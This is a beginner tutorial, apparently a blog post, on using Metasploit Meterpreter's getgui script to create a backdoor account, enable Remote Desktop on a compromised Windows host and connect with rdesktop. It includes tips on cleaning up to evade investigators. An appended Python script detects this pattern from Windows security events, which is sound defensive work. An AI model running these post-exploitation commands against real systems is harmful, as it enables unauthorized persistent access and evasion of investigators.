5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Type: Tutorial
Level: Beginner, Medium
Last year, when I was teaching a computer security class, one student came and asked, "can you give me a simple tutorial on how to use the command prompt?" I said, "I don't think it can be done in a short course, because to learn the command prompt you should practice every day at first and make it as familiar as your mother tongue." From this situation I learned that not everyone knows about the command prompt or other console-based tools. How about hacking? Yep, it's the same... sometimes newcomers just follow tutorials but don't know what exactly they are doing.
Today I will write a simple tutorial on how to enable Remote Desktop (the Remote Desktop Protocol on TCP port 3389) once you are already inside a remote system using the Metasploit Framework. This method should be useful if you are limited in what you can do from the command prompt. In this case we will use Carlos Perez's 'getgui' Meterpreter script, which enables Remote Desktop and creates a user account for you to log in with.

Requirements:

2. Backtrack 5 (or another Linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter:

1. My favourite Meterpreter payload is reverse_tcp. If you also want to use reverse_tcp as your payload, set it with the command below.
set payload windows/meterpreter/reverse_tcp
2. Inside the Meterpreter session, execute

meterpreter > run getgui -h

to view the help.
3. To add a user with username valent and password r4h45i4, and then enable the Remote Desktop service, run:

meterpreter > run getgui -u valent -p r4h45i4

Yep, we have successfully created the user and activated the Remote Desktop service.
Please note the last line of the output, "For cleanup use command : run multi_console_command…". It will be used after you finish using the Remote Desktop service on the victim computer.
4. To connect to the victim over Remote Desktop, we can use the rdesktop program (it is already installed on Backtrack).

rdesktop -u <username> -p <password> <ip-address-target>

Initializing... and then...
5. You should also remember that when you add a user, you are adding a new user on the remote computer. Be wise in using this method, because the more changes you make, the more traces you leave on the remote computer, and they can be tracked by investigators :-) . To clean up the user we created earlier, use the cleanup command printed at the end of step 3.
Finish…
Hope it's useful for you... any questions? Just drop them in the comment box. :-)
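Step 5's warning cuts both ways: the traces getgui leaves on the target (a new local account, group membership changes, Remote Desktop switched on, and a remote logon by that account) are exactly what an investigator or a detection rule looks for. The following Python script is an added example, not part of the original tutorial or of the getgui script; it runs correlation logic over a few constructed Security-log records and a constructed registry snapshot. The event IDs (4720 account created, 4732 member added to a local group, 4624 logon with type 10 = RemoteInteractive) and the fDenyTSConnections registry value are real Windows identifiers; the key=value record format, the account names, timestamps and the scoring thresholds are assumptions made up for this example.

```python
"""Correlate the host-side traces left by enabling Remote Desktop and adding a
local user, as described in the tutorial (added example, not project code).

Input is constructed: Security-log records flattened to 'key=value' tokens
(quoted where values contain spaces) plus a small registry snapshot.
"""
import shlex
from datetime import datetime, timedelta

# Real Windows Security event IDs used for the correlation.
EVT_USER_CREATED = 4720      # "A user account was created."
EVT_LOCAL_GROUP_ADD = 4732   # "A member was added to a security-enabled local group."
EVT_LOGON = 4624             # "An account was successfully logged on."
RDP_LOGON_TYPE = "10"        # RemoteInteractive (Terminal Services / RDP)

# Real registry value: 0 means Remote Desktop connections are allowed.
FDENY_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
RDP_GROUPS = {"Remote Desktop Users", "Administrators"}

# Constructed sample records (format, names and times are assumptions).
SAMPLE_EVENTS = [
    'time=2011-03-01T08:00:00 id=4624 user=alice logon_type=2 src=-',
    'time=2011-03-01T10:00:01 id=4720 subject=Administrator target=valent',
    'time=2011-03-01T10:00:02 id=4732 group="Remote Desktop Users" member=valent',
    'time=2011-03-01T10:00:02 id=4732 group="Administrators" member=valent',
    'time=2011-03-01T10:05:40 id=4624 user=valent logon_type=10 src=10.0.0.7',
    'time=2011-03-01T11:30:00 id=4720 subject=Administrator target=svc_backup',
]
SAMPLE_REGISTRY = {FDENY_KEY: 0}


def parse_event(line):
    """Turn one 'key=value ...' record into a dict; id and time are typed."""
    fields = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        fields[key] = value
    fields["id"] = int(fields["id"])
    fields["time"] = datetime.fromisoformat(fields["time"])
    return fields


def rdp_enabled(registry):
    """True when fDenyTSConnections is 0, i.e. RDP connections are accepted."""
    return registry.get(FDENY_KEY) == 0


def detect_rdp_backdoor(lines, registry, window=timedelta(minutes=30)):
    """For every newly created account, gather the RDP-related follow-up
    events and score them. Thresholds are an assumption for the example: a
    brand-new account that is dropped into an RDP-capable group and then logs
    on over RDP within `window` of its creation is rated high severity."""
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["time"])
    created = {e["target"]: e["time"] for e in events if e["id"] == EVT_USER_CREATED}
    findings = []
    for account, t0 in created.items():
        groups = {
            e["group"] for e in events
            if e["id"] == EVT_LOCAL_GROUP_ADD and e.get("member") == account and e["time"] >= t0
        }
        rdp_groups = sorted(groups & RDP_GROUPS)
        rdp_logons = [
            e for e in events
            if e["id"] == EVT_LOGON and e.get("user") == account
            and e.get("logon_type") == RDP_LOGON_TYPE and t0 <= e["time"] <= t0 + window
        ]
        score = 1 + len(rdp_groups) + (2 if rdp_logons else 0) + (1 if rdp_enabled(registry) else 0)
        findings.append({
            "account": account,
            "created": t0.isoformat(),
            "rdp_groups": rdp_groups,
            "rdp_logons": len(rdp_logons),
            "rdp_enabled": rdp_enabled(registry),
            "score": score,
            "severity": "high" if score >= 4 else "low",
        })
    return findings


if __name__ == "__main__":
    for finding in detect_rdp_backdoor(SAMPLE_EVENTS, SAMPLE_REGISTRY):
        print(finding)
```

On a real host the same correlation applies to the Security log exported from Event Viewer or pulled with the Get-WinEvent cmdlet; the script only needs the records rendered into the same key=value form. The benign "svc_backup" account in the sample shows why the score matters: a new account on its own is routine, while a new account that is immediately placed in Remote Desktop Users and Administrators and then logs on with logon type 10 is the sequence this tutorial produces.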
